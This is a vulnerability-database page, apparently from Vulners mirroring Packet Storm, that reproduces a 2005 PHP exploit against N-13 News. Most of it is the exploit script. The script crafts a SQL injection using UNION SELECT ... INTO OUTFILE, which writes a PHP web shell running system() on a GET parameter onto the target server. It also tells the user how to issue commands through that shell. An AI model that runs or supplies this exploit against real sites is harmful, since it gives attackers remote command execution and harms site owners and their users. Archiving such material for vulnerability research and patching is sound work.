Lucene search

K

n13SQL.php.txt

🗓️ 02 Dec 2005 00:00:00Reported by KingOfSkaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 28 Views

N-13 News Remote SQL / PHP-Shell Injection affecting all versions with specific condition

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`<?php  
  
### 0 day -- 29/11/2005  
###  
### N-13 News Remote SQL / PHP-Shell Injection   
###  
### Just upload in a web-server with mod_php  
### and run it trhough your browser ;)  
###  
### Affected Software : http://network-13.com/ N-13 News  
### Version: All  
### Exploit discovere and written by: KingOfSka @ http://contropotere.altervista.org  
### Condition: Magic Quotes OFF  
### A world writeable directory accessible trough HTTP  
### To detect Server Path to N-13 just visit: http://www.site.com/n13/index.php?id=0'  
###  
?>  
<html>  
<head>  
<title> .::KingOfSka N-13 News Remote PHP Shell Injection::. || http://contropotere.altervista.org || </title>  
</head>  
<body>  
<header> .::KingOfSka N-13 News PHP Shell Injection::. || <a href = "http://contropotere.altervista.org/limbo/"> Contro Potere Hacking Crew </a> || </header> <br /> <br />  
<?php  
if (isset($_POST['url'])) {  
$url = $_POST['url'];  
$path2news = $_POST['path2news'];  
$outfile = $_POST ['outfile'];  
$sql = "0' UNION SELECT '0' , '<? system(\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 INTO OUTFILE '$outfile";  
$sql = urlencode($sql);  
$expurl= $url."?id=".$sql ;  
echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';  
echo "After clicking go to http://www.site.com/path2phpshell/shell.php?cpc=ls to see results";  
}  
else  
{  
?>  
Url to index.php: <br />   
<form action = "<?php echo "$_SERVER[PHP_SELF]" ; ?>" method = "post">  
<input type = "text" name = "url" value = "http://www.site.com/n13/index.php" size = "50"> <br />  
Server Path to Shell: <br />  
Full server path to a writable file which will contain the Php Shell <br />  
<input type = "text" name = "outfile" value = "/var/www/localhost/htdocs/n13/shell.php" size = "50"> <br /> <br />  
<input type = "submit" value = "Create Exploit"> <br /> <br />  
  
  
  
<?php  
}  
?>  
</body>  
</html>  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo